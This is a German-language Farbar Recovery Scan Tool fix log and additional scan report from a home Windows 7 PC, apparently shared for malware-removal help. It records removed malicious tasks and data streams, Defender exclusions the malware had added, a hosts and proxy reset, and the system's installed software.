"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E7DD5F8-0819-4296-8B92-EEA20358E2F3} => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MainPMgr => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB4D74FB-B89A-4A74-982B-76AE532F4F7F} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_OT => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159} => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => nicht gefunden
"C:\Program Files\Reimage" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsRecoveryCleaner => nicht gefunden
"C:\ProgramData\Iostream.exe" => nicht gefunden
C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Verknüpfung Eigenschaft erfolgreich entfernt
C:\ProgramData => ":NT" ADS erfolgreich entfernt
C:\ProgramData => ":NT2" ADS erfolgreich entfernt
"C:\Users\All Users" => ":NT" ADS nicht gefunden.
"C:\Users\All Users" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT2" ADS nicht gefunden.
C:\ProgramData\MTA San Andreas All => ":NT" ADS erfolgreich entfernt
C:\ProgramData\MTA San Andreas All => ":NT2" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT2" ADS erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming" => ":NT" ADS nicht gefunden.
"C:\Users\Nico\AppData\Roaming" => ":NT2" ADS nicht gefunden.
C:\Users\Public\AppData => ":CSM" ADS erfolgreich entfernt
"C:\Windows\system32\Drivers\etc\hosts" => wurde entsperrt
C:\Windows\system32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
VirusTotal: C:\Windows\system32\ntkrnlmp.exe => https://www.virustotal.com/file/5e27f275cd06956184baf125169bf6ab99368a90d203a9b7ee9fe61119b7ea6f/analysis/1526925422/
VirusTotal: C:\Windows\system32\osloader.exe => https://www.virustotal.com/file/ee1810c3bec825b672a40bec7438486c5b344332e2a06b9cd79f7213aa7a578b/analysis/1527842028/
"VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe" => nicht gefunden

========= dir "%ProgramFiles%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files

31.05.2018  16:22    <DIR>          .
31.05.2018  16:22    <DIR>          ..
02.01.2018  17:33    <DIR>          AMD
02.01.2018  17:15    <DIR>          ASUS
31.05.2018  14:13    <DIR>          Common Files
03.05.2018  05:14    <DIR>          DVD Maker
01.03.2018  13:58    <DIR>          Epic Games
02.01.2018  17:15    <DIR>          Intel
09.05.2018  03:16    <DIR>          Internet Explorer
02.01.2018  20:09    <DIR>          Logitech Gaming Software
31.05.2018  16:22    <DIR>          Malwarebytes
14.07.2009  09:46    <DIR>          Microsoft Games
27.05.2018  11:46    <DIR>          Mozilla Firefox
14.07.2009  07:32    <DIR>          MSBuild
02.01.2018  17:07    <DIR>          Realtek
14.07.2009  07:32    <DIR>          Reference Assemblies
08.05.2018  20:21    <DIR>          TeamSpeak 3 Client
03.05.2018  05:14    <DIR>          Windows Defender
02.01.2018  18:11    <DIR>          Windows Mail
03.05.2018  05:14    <DIR>          Windows Media Player
02.01.2018  16:16    <DIR>          Windows NT
02.01.2018  18:11    <DIR>          Windows Photo Viewer
02.01.2018  18:11    <DIR>          Windows Portable Devices
02.01.2018  18:11    <DIR>          Windows Sidebar
27.05.2018  09:43    <DIR>          WinRAR
              0 Datei(en),              0 Bytes
              25 Verzeichnis(se), 836.029.267.968 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramFiles(x86)%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files (x86)

27.05.2018  15:37    <DIR>          .
27.05.2018  15:37    <DIR>          ..
25.04.2018  20:02    <DIR>          Adobe
02.01.2018  17:33    <DIR>          AMD
02.01.2018  17:05    <DIR>          ASUS
31.05.2018  14:13    <DIR>          Common Files
01.06.2018  10:01    <DIR>          Drakensang Online
01.03.2018  13:56    <DIR>          Epic Games
02.01.2018  17:15    <DIR>          Intel
27.05.2018  09:11    <DIR>          Internet Explorer
07.04.2018  18:40    <DIR>          KeePass Password Safe 2
02.01.2018  17:06    <DIR>          Microsoft.NET
27.05.2018  11:46    <DIR>          Mozilla Maintenance Service
14.07.2009  07:32    <DIR>          MSBuild
27.05.2018  09:21    <DIR>          MTA San Andreas 1.5
06.01.2018  04:24    <DIR>          obs-studio
27.05.2018  11:16    <DIR>          OkayFreedom
29.01.2018  16:59    <DIR>          OpenOffice 4
02.01.2018  17:06    <DIR>          Realtek
14.07.2009  07:32    <DIR>          Reference Assemblies
25.05.2018  12:20    <DIR>          Rockstar Games
31.05.2018  21:31    <DIR>          Steam
03.05.2018  05:14    <DIR>          Windows Defender
02.01.2018  18:11    <DIR>          Windows Mail
03.05.2018  05:14    <DIR>          Windows Media Player
14.07.2009  07:32    <DIR>          Windows NT
02.01.2018  18:11    <DIR>          Windows Photo Viewer
02.01.2018  18:11    <DIR>          Windows Portable Devices
02.01.2018  18:11    <DIR>          Windows Sidebar
17.05.2018  08:27    <DIR>          YaTQA
              0 Datei(en),              0 Bytes
              30 Verzeichnis(se), 836.029.149.184 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramData%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\ProgramData

26.04.2018  08:13    <DIR>          Adobe
24.05.2018  18:04    <DIR>          Epic
27.05.2018  09:47    <DIR>          Intel
31.05.2018  14:04    <DIR>          Logishrd
31.05.2018  16:22    <DIR>          Malwarebytes
25.05.2018  12:24    <DIR>          MTA San Andreas All
02.01.2018  21:29    <DIR>          Riot Games
              0 Datei(en),              0 Bytes
              7 Verzeichnis(se), 836.000.247.808 Bytes frei

========= Ende von CMD: =========


========= dir "%Appdata%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Users\Nico\AppData\Roaming

31.05.2018  16:26    <DIR>          .
31.05.2018  16:26    <DIR>          ..
25.04.2018  20:02    <DIR>          Adobe
06.01.2018  04:28    <DIR>          AMD
10.01.2018  20:24    <DIR>          ATI
11.03.2018  01:39    <DIR>          Axolot Games
30.05.2018  09:53    <DIR>          DarkSoulsII
13.01.2018  16:31    <DIR>          DVDVideoSoft
02.01.2018  16:17    <DIR>          Identities
10.04.2018  11:45    <DIR>          KeePass
02.01.2018  20:06    <DIR>          Logitech
06.01.2018  04:33    <DIR>          Macromedia
02.01.2018  17:18    <DIR>          Mozilla
02.05.2018  09:39    <DIR>          obs-studio
29.01.2018  16:59    <DIR>          OpenOffice
31.05.2018  13:37    <DIR>          Spotify
01.06.2018  10:33    <DIR>          TS3Client
27.05.2018  09:43    <DIR>          WinRAR
17.05.2018  08:31    <DIR>          YaTQA
              0 Datei(en),              0 Bytes
              19 Verzeichnis(se), 836.000.182.272 Bytes frei

========= Ende von CMD: =========


========= dir "%LocalAppdata%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Users\Nico\AppData\Local

01.06.2018  10:33    <DIR>          .
01.06.2018  10:33    <DIR>          ..
27.05.2018  09:35    <DIR>          Adobe
02.01.2018  20:11    <DIR>          AMD
10.01.2018  20:24    <DIR>          ATI
11.03.2018  10:31    <DIR>          Axolot Games
02.01.2018  20:19    <DIR>          BFH_Test_Launcher
02.01.2018  19:32    <DIR>          CEF
02.01.2018  16:27    <DIR>          cFos
24.05.2018  18:36    <DIR>          ElevatedDiagnostics
01.03.2018  13:56    <DIR>          EpicGamesLauncher
27.05.2018  10:40    <DIR>          ESET
01.03.2018  14:58    <DIR>          FortniteGame
03.05.2018  20:47            64.480 GDIPFONTCACHEV1.DAT
02.01.2018  20:11    <DIR>          Logitech
27.05.2018  09:47    <DIR>          Microsoft
02.01.2018  17:19    <DIR>          Mozilla
02.01.2018  22:31    <DIR>          NVIDIA Corporation
20.05.2018  15:01    <DIR>          osu!
10.01.2018  10:22    <DIR>          Programs
02.01.2018  17:24    <DIR>          RadeonInstaller
07.01.2018  15:41    <DIR>          RadeonSettings
10.02.2018  10:17    <DIR>          Razer
10.02.2018  09:58    <DIR>          Razer_Inc
31.05.2018  13:44    <DIR>          Spotify
02.01.2018  19:32    <DIR>          Steam
01.06.2018  10:33    <DIR>          Temp
02.01.2018  22:30    <DIR>          TslGame
01.03.2018  14:58    <DIR>          UnrealEngine
01.03.2018  13:56    <DIR>          UnrealEngineLauncher
02.01.2018  16:16    <DIR>          VirtualStore
              1 Datei(en),        64.480 Bytes
              30 Verzeichnis(se), 836.000.112.640 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramFiles(x86)%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files (x86)\Common Files

31.05.2018  14:13    <DIR>          .
31.05.2018  14:13    <DIR>          ..
25.04.2018  20:02    <DIR>          Adobe
25.05.2018  20:48    <DIR>          BattlEye
13.01.2018  16:31    <DIR>          DVDVideoSoft
02.01.2018  17:06    <DIR>          InstallShield
30.05.2018  09:52    <DIR>          microsoft shared
02.01.2018  17:15    <DIR>          PostureAgent
14.07.2009  05:20    <DIR>          Services
14.07.2009  05:20    <DIR>          SpeechEngines
20.05.2018  08:45    <DIR>          Steam
03.05.2018  05:15    <DIR>          System
              0 Datei(en),              0 Bytes
              12 Verzeichnis(se), 835.999.920.128 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramW6432%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files\Common Files

31.05.2018  14:13    <DIR>          .
31.05.2018  14:13    <DIR>          ..
02.01.2018  17:32    <DIR>          ATI Technologies
30.05.2018  09:52    <DIR>          Microsoft Shared
14.07.2009  05:20    <DIR>          Services
14.07.2009  05:20    <DIR>          SpeechEngines
03.05.2018  05:15    <DIR>          System
              0 Datei(en),              0 Bytes
              7 Verzeichnis(se), 835.999.928.320 Bytes frei

========= Ende von CMD: =========


========= dir "%UserProfile%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Users\Nico

01.06.2018  10:33    <DIR>          .
01.06.2018  10:33    <DIR>          ..
06.01.2018  12:05    <DIR>          Aufnahmen
17.02.2018  09:51    <DIR>          BFH
03.05.2018  08:36    <DIR>          Contacts
01.06.2018  10:01    <DIR>          Desktop
27.05.2018  09:24    <DIR>          Documents
01.06.2018  10:33    <DIR>          Downloads
03.05.2018  08:36    <DIR>          Favorites
02.01.2018  17:14    <DIR>          Intel
03.05.2018  08:36    <DIR>          Links
03.05.2018  08:36    <DIR>          Music
12.05.2018  22:30    <DIR>          Pictures
03.05.2018  08:36    <DIR>          Saved Games
03.05.2018  08:36    <DIR>          Searches
03.05.2018  08:36    <DIR>          Videos
              0 Datei(en),              0 Bytes
              16 Verzeichnis(se), 835.999.842.304 Bytes frei

========= Ende von CMD: =========


========= dir "C:\" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\

31.05.2018  16:17    <DIR>          AdwCleaner
02.01.2018  17:36    <DIR>          AMD
27.05.2018  15:09    <DIR>          AppData
01.06.2018  10:33    <DIR>          FRST
27.05.2018  14:58                0 History
02.01.2018  17:12    <DIR>          Intel
31.05.2018  14:04        1.893.155 myexe.exe
14.07.2009  05:20    <DIR>          PerfLogs
31.05.2018  16:22    <DIR>          Program Files
27.05.2018  15:37    <DIR>          Program Files (x86)
02.01.2018  21:28    <DIR>          Riot Games
02.01.2018  16:16    <DIR>          Users
01.06.2018  10:33    <DIR>          Windows
              2 Datei(en),      1.893.155 Bytes
              11 Verzeichnis(se), 835.998.208.000 Bytes frei

========= Ende von CMD: =========

================== ExportKey: ===================

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\Windows"="0"
"C:\Windows\rss"="0"
"C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet"="0"
"C:\Users\Nico\AppData\Local\Temp\csrss"="0"
"C:\Users\Nico\AppData\Roaming\PatientSunset"="0"
"C:\Windows\windefender.exe"="0"
"C:\Users\Nico\AppData\Local\Temp\wup"="0"
"C:\Windows\System32\drivers"="0"
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"csrss.exe"="0"
"cloudnet.exe"="0"
"windefender.exe"="0"

=== Ende von ExportKey ===

========= RemoveProxy: =========

"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt


========= Ende von RemoveProxy: =========


========= ipconfig /flushdns =========


Windows-IP-Konfiguration

Der DNS-Aufl”sungscache wurde geleert.

========= Ende von CMD: =========


========= netsh winsock reset catalog =========


Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.


========= Ende von CMD: =========


========= netsh advfirewall reset =========

OK.


========= Ende von CMD: =========


========= netsh advfirewall set allprofiles state ON =========

OK.


========= Ende von CMD: =========


========= Bitsadmin /Reset /Allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36661039 B
Java, Flash, Steam htmlcache => 165183668 B
Windows/system/drivers => 69174937 B
Edge => 0 B
Chrome => 0 B
Firefox => 393009119 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58583585 B
systemprofile32 => 22979380 B
LocalService => 66228 B
NetworkService => 185242 B
Nico => 310643623 B

RecycleBin => 321072 B
EmptyTemp: => 1015.9 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 10:35:56 ====
Addition

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:42:14)
Gestartet von C:\Users\Nico\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2018-01-02 14:16:48)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1284053026-2775073283-1402561352-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1284053026-2775073283-1402561352-1002 - Limited - Enabled)
Gast (S-1-5-21-1284053026-2775073283-1402561352-501 - Limited - Disabled)
Nico (S-1-5-21-1284053026-2775073283-1402561352-1000 - Administrator - Enabled) => C:\Users\Nico

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.171 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.2 - Advanced Micro Devices, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Drakensang Online (HKLM-x32\...\Drakensang Online) (Version:  - )
Epic Games Launcher (HKLM-x32\...\{70843FAC-DA36-49CD-A9A1-6CB1665C9346}) (Version: 1.1.143.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel(R) Network Connections 19.1.51.0 (HKLM\...\PROSetDX) (Version: 19.1.51.0 - Intel)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
KeePass Password Safe 2.38 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.38 - Dominik Reichl)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Logitech Gaming Software 8.96 (HKLM\...\Logitech Gaming Software) (Version: 8.96.88 - Logitech Inc.)
Malwarebytes Version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.7.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Mozilla Firefox 60.0.1 (x64 de) (HKLM\...\Mozilla Firefox 60.0.1 (x64 de)) (Version: 60.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.1 - Mozilla)
MTA:SA v1.5.5 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.5 - Multi Theft Auto)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 20.1.3 - OBS Project)
OpenOffice 4.1.5 (HKLM-x32\...\{F0C909D7-D643-4628-8C6A-94073139F0CE}) (Version: 4.15.9789 - Apache Software Foundation)
osu! (HKLM-x32\...\{5fae645a-e4b4-4541-a037-7e4aa9f3e40a}) (Version: latest - ppy Pty Ltd)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7233 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{DDA8E261-B96C-4D2B-887F-D8AF1D7EF361}) (Version: 4.0.4 - SystemaRev) Hidden
Spotify (HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Spotify) (Version: 1.0.80.474.gef6b503e - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-17] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {48AFC486-010B-4B4D-87F2-9F7C7EDA12AF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {57F4CA92-38A7-4B47-8B28-13BE860412BD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {657B38A1-8903-4F90-8E4D-E9C7AEFDC6FC} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {B51F287F-670C-42C3-A480-43546148601C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {CBF07082-94D0-43DD-961D-5221CC36D495} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2018-02-01] ()
Task: {D74FFB45-80D0-40D0-B76B-3411A9AA73A2} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_171_Plugin.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {E3E11419-953A-4F4A-89E6-E6FE35B1A897} - System32\Tasks\ASUS\i-Setup161131 => C:\Windows\MEI\AsusSetup.exe [2013-08-22] (ASUSTeK Computer Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2018-01-02 17:05 - 2014-01-28 05:16 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
2018-05-31 16:22 - 2018-04-30 12:54 - 002493648 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2018-05-31 16:22 - 2018-04-25 13:16 - 002297040 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000077824 _____ () C:\Program Files\Logitech Gaming Software\LAClient\zlib.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000144896 _____ () C:\Program Files\Logitech Gaming Software\LAClient\libssh2.dll
2018-01-02 17:05 - 2018-06-01 10:37 - 000033280 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\PEbiosinterface32.dll
2018-01-02 17:05 - 2014-01-28 05:16 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\ATKEX.dll
